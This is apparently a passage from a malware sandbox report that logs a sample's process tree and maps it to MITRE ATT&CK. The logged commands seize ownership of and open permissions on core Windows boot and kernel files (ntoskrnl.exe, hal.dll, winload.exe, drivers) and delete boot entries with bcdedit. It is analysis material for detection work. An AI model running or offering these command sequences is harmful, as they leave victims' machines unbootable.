- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:1960
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:1072
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2948
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2000
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2924
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2708
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3068
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1928
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2508
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2232
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:2180
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:484
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2200
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:2436
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2188
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:2236
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2216
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Possible privilege escalation attempt
  PID:804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2276
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1656
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1144
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2588
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2808
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1944
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1324
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2444
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:976
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1708
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:892
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1512
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2980
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:1520
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:1888
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2212
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2272
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:1108
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:924
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:1668
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:568
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2332
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2392
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2144
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:1992
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:864
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:844
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1996
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:880
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:2464
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2136
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1600
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:3060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2068
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2416
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2396
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2556
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2540
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2576
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2084
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2796
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2792
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2088
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2080
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:580
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2756
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2752
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2872
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2880
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2764
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2760
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2908
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2932
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2472
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2724
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2768
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2632
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Possible privilege escalation attempt
  PID:1884
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2628
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2988
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1864
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2660
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1940
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:272
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1048
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2012
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1392
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2440
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1160
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1620
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1456
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1176
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1564
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:284
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:1644
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1612
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2004
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:1896
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:840
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2860
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2832
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:820
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2984
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2704
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2848
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2708
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2824
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Possible privilege escalation attempt
  PID:2192
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:2504
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2700
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:2468
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2500
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:2992
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2204
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:3048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1880
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2960
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:444
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1956
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2108
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:356
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1228
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1944
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:784
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1672
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:976
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:1948
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:1088
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2836
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:904
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:1780
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:908
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:1428
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:296
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2572
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:780
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2496
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:568
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Possible privilege escalation attempt
  PID:1484
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Possible privilege escalation attempt
  PID:2968
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:1988
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2448
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:1752
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1936
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1740
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:3056
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2248
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads